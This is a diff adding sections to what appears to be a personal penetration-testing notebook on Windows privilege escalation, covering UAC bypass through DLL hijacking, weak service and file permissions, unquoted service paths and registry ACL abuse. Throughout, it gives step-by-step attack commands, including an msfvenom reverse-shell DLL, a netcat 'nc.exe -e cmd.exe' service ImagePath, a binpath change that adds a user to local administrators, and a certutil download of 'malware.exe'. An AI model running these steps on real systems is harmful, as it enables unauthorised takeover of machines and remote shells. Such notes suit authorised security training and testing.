--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -454,7 +454,10 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "* **[Kernel Exploits](#windowsprivesckernelexp)**\n"
+    "* **[UAC](#windowsprivescuseraccountcontrol)**\n",
+    "* **[Weak Permissions](#windowsprivesshittyperms)**\n",
+    "* **[Kernel Exploits](#windowsprivesckernelexp)**\n",
+    "* **[Vulnerable Services](#windowsprivespvulnserv)**"
    ]
   },
   {
@@ -10759,6 +10762,194 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "<a id=\"windowsprivescuseraccountcontrol\"></a>\n",
+    "\n",
+    "#### **`UAC`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "UAC enables a consent prompt for elevated activities. Applications have different integrity levels, and a program with a high level can perform tasks that could potentially compromise the system. **When UAC is enabled, applications and tasks always run under a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run.** This is a convenience feature that protects administrators from unintented changes, but it is not considered a security boundary. \n",
+    "\n",
+    "When UAC is in place, a user can log into their system with their standard user account. When processes are launched using a standard user token, they can perform tasks using the rights granted to a standard user. Some applications require additional permissions to run, and UAC can provide additional access rights to the token for them to run correctly. Administrators can use security policies to configure how UAC works specific to their organization at the local level (via secpol.msc), or configured and pushed out via GPOs in an AD environment. There are 10 group policy settings that can be set for UAC:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Group Policy Setting|Registry Key|Default Setting|\n",
+    "|--------------------|------------|---------------|\n",
+    "|Admin Approval Mode for the built-in Administrator account|FilterAdministratorToken|Disabled|\n",
+    "|Allow UIAccess applications to prompt for elevation without using the secure desktop|EnableUIADesktopToggle|Disabled|\n",
+    "|Behavior of the elevation prompt for administrators in Admin Approval Mode|ConsentPromptBehaviorAdmin|Prompt for consent for non-Windows binaries|\n",
+    "|Behavior of the elevation prompt for standard users|ConsentPromptBehaviorUser|Prompt for credentials on the secure desktop|\n",
+    "|Detect application installations and prompt for elevation|EnableInstallerDetection|Enabled (default for Home) Disabled (default for Enterprise)|\n",
+    "|Only elevate executables that are signed and validated|ValidateAdminCodeSignatures|Disabled|\n",
+    "|Only elevate UIAccess applications that are installed in secure locations|EnableSecureUIAPaths|Enabled|\n",
+    "|Run all administrators in Admin Approval Mode|EnableLUA|Enabled|\n",
+    "|Switch to the secure desktop when prompting for elevation|PromptOnSecureDesktop|Enabled|\n",
+    "|Virtualize file and registry write failures to per-user locations|EnableVirtualization|Enabled|\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "While UAC should be enabled, it does not stop an attacker from escalating privileges, it may just slow them down and force them to do noticeable tactics. The default RID 500 administrator account always operates at the high mandatory level. With **Admin Approval Mode (AAM)** enabled, any newly created admin accounts will operate at the medium mandatory level by default and be assigned two separate access tokens upon logging in. \n",
+    "\n",
+    "**1. Confirm UAC is Enabled and the Level:** There is no CLI version of the GUI consent prompt, so UAC must be bypassed to execute commands with the privileged access token (if the user is in a privileged group or has certain privileges). From this command, `notice the value of ConsentPromptBehaviorAdmin; 0x5 is the highest UAC level (Always notify)`. At higher levels, such as 0x5, there will be fewer UAC bypasses. \n",
+    "```powershell\n",
+    "REG QUERY HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ /v EnableLUA     #enabled?\n",
+    "\n",
+    "REG QUERY HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ /v ConsentPromptBehaviorAdmin   #level\n",
+    "```\n",
+    "**2. Check Windows Version:** UAC bypasses leverage flaws or unintended functionality in different Windows builds; therefore, it is critical to determine which version of Windows is running on the target machine. Focus on the **`Build`** number then reference this **[page](https://en.wikipedia.org/wiki/Windows_10_version_history)** to get the exact version. This page only shows Windows 10 versions, so if the machine is another release, find another page that lists the versions and builds for that release (i.e., Windows Vista, Windows 11, etc), or just google the build number.\n",
+    "```powershell\n",
+    "[environment]::OSVersion.Version\n",
+    "```\n",
+    "**3. Bypass UAC:** To get a comprehensive list of UAC bypasses, reference the **[UACME](https://github.com/hfiref0x/UACME/tree/v3.2.x)** list with the encountered build number, then download the associated bypass. Before blindly doing a UAC bypass, find out exactly what is happening in case any changes need to be reverted, and to find out additional steps that need to be done (if any) before the bypass.\n",
+    "\n",
+    "<br>\n",
+    "\n",
+    "**<u>Example: Windows Build Version 14393 (Windows Release 1607)</u>**\n",
+    "\n",
+    "In this example, assume that the value of ConsentPromptBehaviorAdmin is 0x5, which is the highest UAC level. For this UAC bypass, the 32-bit version of the auto-elevating binary SystemPropertiesAdvanced.exe is targeted; this binary is one of many that Windows trust to auto-elevate without the need for a UAC consent prompt. The 32-bit version of SystemPropertiesAdvanced.exe attempts to load the non-existent DLL srrstr.dll, which is used by System Restore functionality. When attempting to locate a DLL, Windows uses the following search order:\n",
+    "\n",
+    "   1. The directory from which the application loaded\n",
+    "   2. The system directory C:Windows\\System32 for 64-bit systems\n",
+    "   3. The 16-bit system directory C:\\Windows\\System (N/A on 64-bit systems)\n",
+    "   4. The Windows directory\n",
+    "   5. Any directories that are listed in the PATH environment variable\n",
+    "\n",
+    "**1. Review Path Variable:** The following command will reveal the default folders. Look for a writeable WindowsApps folder within the current user's profile.\n",
+    "```powershell\n",
+    "cmd /c echo %PATH%\n",
+    "```\n",
+    "**2. Generating Malicious srrstr.dll DLL:** The UAC can possibly be bypassed via DLL hijacking by placing a malicious srrstr.dll DLL to the folder, which will be loaded in an elevated context. After this is generated, transfer the payload to the target host and place it within the previously found path (i.e., C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll). Start an nc listener on the attack host too. \n",
+    "```bash\n",
+    "msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f dll > srrstr.dll\n",
+    "```\n",
+    "**3. Test Connection:** If the malicious srrstr.dll is executed, the attack host will receive a shell with the normal user rights :/ (UAC enabled). Regardless, test run the DLL as follows to get the reverse shell connection, and keep running the nc listener for step #5\n",
+    "```powershell\n",
+    "rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll\n",
+    "```\n",
+    "**4. Kill RunDLL32 Processes** \n",
+    "```powershell\n",
+    "tasklist /svc | findstr \"rundll32\"     #find PIDs\n",
+    "taskkill /PID xxxx /F      #kill all procs\n",
+    "```\n",
+    "**5. Execute SystemPropertiesAdvanced.exe on Target:** Make sure the nc listener is still on, targeting the port specified in the msfvenom payload. If this works, the received shell should be elevated, and the privileges available (can be enabled ATP)\n",
+    "```powershell\n",
+    "C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"windowsprivesshittyperms\"></a>\n",
+    "\n",
+    "#### **`Weak Permissions`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Services usually install with SYSTEM privileges, so leveraging a service permissions-related flaw can often lead to complete control over the target system; regardless of the environment, always check for weak permissions both manually and with tools (if allowed)\n",
+    "\n",
+    "**<u>Permissive File System ACLs</u>**\n",
+    "\n",
+    "**1. Use [SharpUp.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe):** This tool can be used to check for service binaries with weak ACLs. Specifically, look through the ***Modifiable Service Binaries*** and notate the DisplayName and PathName.\n",
+    "```powershell\n",
+    ".\\SharpUp.exe audit\n",
+    "```\n",
+    "**2. Confirm Vulnerability with icacls:** icacls should already be on the target machine, but if not, download the sysinternals suite. With icacls, specify the path to the previously found modifiable service binary to see the permissions. SharpUp is pretty accurate anyways, but icacls will list the groups and exact permissions over the directory. If EVERYONE and BUILTIN\\Users groups have been granted full permissions to the directory, any unprivileged system user can manipulate the directory and its contents, so the service binary can be modified to (potentially) return a SYSTEM shell on the attack host. It is important to note that this will only give a SYSTEM shell if the service actually runs with SYSTEM privileges; they usually do.\n",
+    "```powershell\n",
+    "icacls \"C:\\Program Files (x86)\\PCProtect\\SecurityService.exe\"\n",
+    "```\n",
+    "**3. Replace Service Binary:** If the service gives the current user startable privileges (indicated by F - Full Privileges), first make a backup of the original binary. Once backed up, replace it with a malicious binary generated with msfvenom. This payload can either give a reverse shell as SYSTEM, or add a local admin user to give the attacker full administrative control over the machine. Of course, send the malicious binary to the target machine, start an nc listener (if a reverse shell was generated), replace the service binary, and then restart the service.\n",
+    "```powershell\n",
+    "cmd /c copy /Y SecurityService.exe \"C:\\Program Files (x86)\\PCProtect\\SecurityService.exe\"\n",
+    "sc start SecurityService\n",
+    "\n",
+    "```\n",
+    "**<u>Weak Service Permissions</u>**\n",
+    "\n",
+    "**1. Use [SharpUp.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe):** In this case, look through the ***Modifiable Services*** section. Again, notate the DisplayName and PathName.\n",
+    "```powershell\n",
+    ".\\SharpUp.exe audit\n",
+    "```\n",
+    "**2. Check Permissions with [AccessChk](https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk):** Enumerate the permissions on the service. The flags: `-q` (omit banner), `-u` (suppress errors), `-v` (verbose), `-c` (specify name of Service), `-w` (only shows objects that have write access). If there are **`SERVICE_ALL_ACCESS`** rights over the service for a group that the user is in, that indicates that they have full read/write control over the service.\n",
+    "```powershell\n",
+    "accesschk.exe /accepteula -quvcw WindscribeService\n",
+    "```\n",
+    "**3. Change Service Binary Path:** If the current user has the proper permissions, change the binary path maliciously. In this case, change it to add the user to the local administrator group. The binary path can be set to run any command or executable, such as a reverse shell binary.\n",
+    "```powershell\n",
+    "sc config WindscribeService binpath=\"cmd /c net localgroup administrators current_user /add\"     #try sc.exe if this does not work\n",
+    "```\n",
+    "**4. Restart Service:** The service must first be stopped so that the new binpath command runs the next time it is started. Again, this only works if the current user has the proper permissions over the service (i.e., full control). The same applies for starting the service again. When starting the service again, an error message will be generated, but it does not matter because the binpath is not pointing to the actual service executable; regardless, the executable will run when the system attempts to start the service before erroring out and stopping the service again, executin whatever command was specified in the binpath.\n",
+    "```bash\n",
+    "sc stop WindscribeService        #try sc.exe if this does not work\n",
+    "sc start WindscribeService\n",
+    "```\n",
+    "**5. Check Local Admin Group Members:** The specified user should now have been added to the administators group. Try previously restricted tasks; if this fails, sign out of the machine and sign back in for the changes to take place.\n",
+    "```bash\n",
+    "net localgroup administrators\n",
+    "```\n",
+    "**6. Cleanup:** After changing the binpath, it is necessary to revert the binary path back to the original service executable.\n",
+    "```bash\n",
+    "sc config WindScribeService binpath=\"c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe\"\n",
+    "sc start WindScribeService\n",
+    "sc query WindScribeService\n",
+    "\n",
+    "```\n",
+    "**<u>Unquoted Service Path</u>**\n",
+    "\n",
+    "When a service is installed, the registry configuration specifies a path to the binary that should be executed on service start. If this binary is not betweem quotes, Windows will attempt to locate the binary in different folders. For example, if `C:\\Program Files (x86)\\System Explorer\\service\\SystemExplorerService64.exe` is specified, Windows attempts to load the following potential executables in order on service start, with a .exe being implied:\n",
+    "1. C:\\Program\n",
+    "2. C:\\Program Files\n",
+    "3. C:\\Program Files (x86)\\System\n",
+    "4. C:\\Program Files (x86)\\System Explorer\\service\\SystemExplorerService64\n",
+    "\n",
+    "**1. Search for Unquoted Service Paths**\n",
+    "```powershell\n",
+    "wmic service get name,displayname,pathname,startmode |findstr /i \"auto\" | findstr /i /v \"c:\\windows\\\\\" | findstr /i /v \"\"\"\n",
+    "```\n",
+    "**2. Query Service**\n",
+    "```powershell\n",
+    "sc qc SystemExplorerHelpService\n",
+    "```\n",
+    "**3. Determine Malicious Payload:** In this case, try to hijack the service binary and gain command execution in the context of the service. This can be done by attempting to create a malicious payload in the following locations:\n",
+    "* C:\\Program.exe\\\n",
+    "* C:\\Program Files (x86)\\System.exe\n",
+    "\n",
+    "It is important to note that creating files in the root (C:\\\\) or the program files folder requires administrative privileges. Even if the system had been misconfigured to allow this, the user likely wouldn't be able to restart the service and would be reliant on a system restart to escalate privileges. While finding applications iwth unquoted service paths is relatively common, it often isn't exploitable\n",
+    "\n",
+    "<br>\n",
+    "\n",
+    "**<u>Permissive Registry ACLs</u>**\n",
+    "\n",
+    "**1. Search for Weak Service ACLs in the Registry:** This can be done with accesschk.exe\n",
+    "```powershell\n",
+    "accesschk.exe /accepteula \"username\" -kvuqsw hklm\\System\\CurrentControlSet\\services\n",
+    "```\n",
+    "**2. Change ImagePath with PowerShell:** Abuse with PowerShell's `Set-ItemProperty` to change the ImagePath value\n",
+    "```powershell\n",
+    "Set-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ModelManagerService -Name \"ImagePath\" -Value \"C:\\Path\\To\\nc.exe -e cmd.exe x.x.x.x xxxx\"  #port=xxxx\n",
+    "\n",
+    "```\n",
+    "\n",
+    "**<u>Modifiable Registry Autorun Binary</u>**\n",
+    "\n",
+    "**1. Check Startup Programs:** Use WMI to see what programs run at system startup. If there are write permissions to the registry for a given binary or a listen binary can be overwritten, it may be possible to escalate privileges to another user the next time they log in. Refer to **[Autorun](windowsprivescregistryautorun)** for privesc tactics.\n",
+    "```bash\n",
+    "Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
     "<a id=\"windowsprivesckernelexp\"></a>\n",
     "\n",
     "#### **`Kernel Exploits`**"
@@ -10794,6 +10985,20 @@
     "certutil -urlcache -f http://x.x.x.x/malware.exe new_name.exe\n",
     "```"
    ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"windowsprivespvulnserv\"></a>\n",
+    "\n",
+    "#### **`Vulnerable Services`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": []
   },
   {
    "cell_type": "markdown",
